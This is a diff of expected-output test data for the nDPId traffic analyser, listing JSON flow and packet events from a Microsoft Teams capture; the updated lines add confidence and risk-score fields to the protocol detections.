 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1587041693572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":1587041693572,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJQAAGwR4OU0cvp7wKgBBg2Ww2AAw6emARMApyESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAh\/IMTdT4SN+oAgAAgAAcHVcadqCg=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgF74AAEARcjPAqAEGNHL6e8N0DZYATEppAAMAMCESpEI9x0RmdejywONbcT4ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041693611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2515,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1587041693625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":1587041693625,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxUAAGwRBmU0cvp7wKgBBg2Ww3QAwyhaARMApyESpEI9x0RmdejywONbcT4ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAhb5VsGDC2J+oAgAAgAAc5scadqCg=="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1587041693640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"ts_msec":1587041693640,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1fJUAAGwR4QY0cvp7wKgBBg2Ww2AAoaFUAQMAhSESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqNgAgABAAAAAaAIAAIAAHB1XGnagqAUAAYm3E8YjrBv7v21SN1g6+m0xjhRrQAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIK\/9w8VcH20Bp+o9r1mX6tB+MRypEJNYTX2DO\/tetQep"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1587041693654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"ts_msec":1587041693654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADySXIAAEARP9\/AqAEGNHL6icN0DZYA3q9FAAMAwiESpELOvwn047sA+HEU4bYADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIW+VbBgwtifoAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACCU7UyKuDgKSJKUvk8SSs9ovhsGMp06Kok2oE1dFOuKzQ=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2521,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1587041693658,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":1587041693658,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJYAAGwR4NE0cvqNwKgBBg2Ww2EAw+F\/ARMApyESpELalY8VcoE3uJ+0vVMADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAiQUL8kDsWN+oAgAAgAAcwTcadqCg=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1587041693668,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1587041693668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgYKIAAEARKUHAqAEGNHL6icN1DZYATE9EAAMAMCESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1587041693698,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"ts_msec":1587041693698,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1VxYAAGwRBoY0cvp7wKgBBg2Ww3QAoWPcAQMAhSESpELOvwn047sA+HEU4bYADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqJgAgABAAAAAaAIAAIAAHObHGnagqAUAAYmiULR7BQSjV7GJ7mOy6WXuQ5anUAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIJWLEhTAIKUMzT0EuyGZ9cU94RPVJanGef0JixSMSj4H"}
 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1587041693711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"ts_msec":1587041693711,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyfgoAAEARC0PAqAEGNHL6jcNhDZYA3rEpAAMAwiESpEJLDXUDhL3sfvdJg10ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIkFC\/JA7FjfoAFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACBfcijkK3I1E6fsjRiPsKvs33Xfpf\/cKnDyh7VrIY168g=="}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1587041693714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":1587041693714,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxcAAGwRBlU0cvqJwKgBBg2Ww3UAwwtKARMApyESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAjDwJ1K7o6J+oAgAAgAAcBocadqCg=="}
@@ -435,36 +435,36 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"}
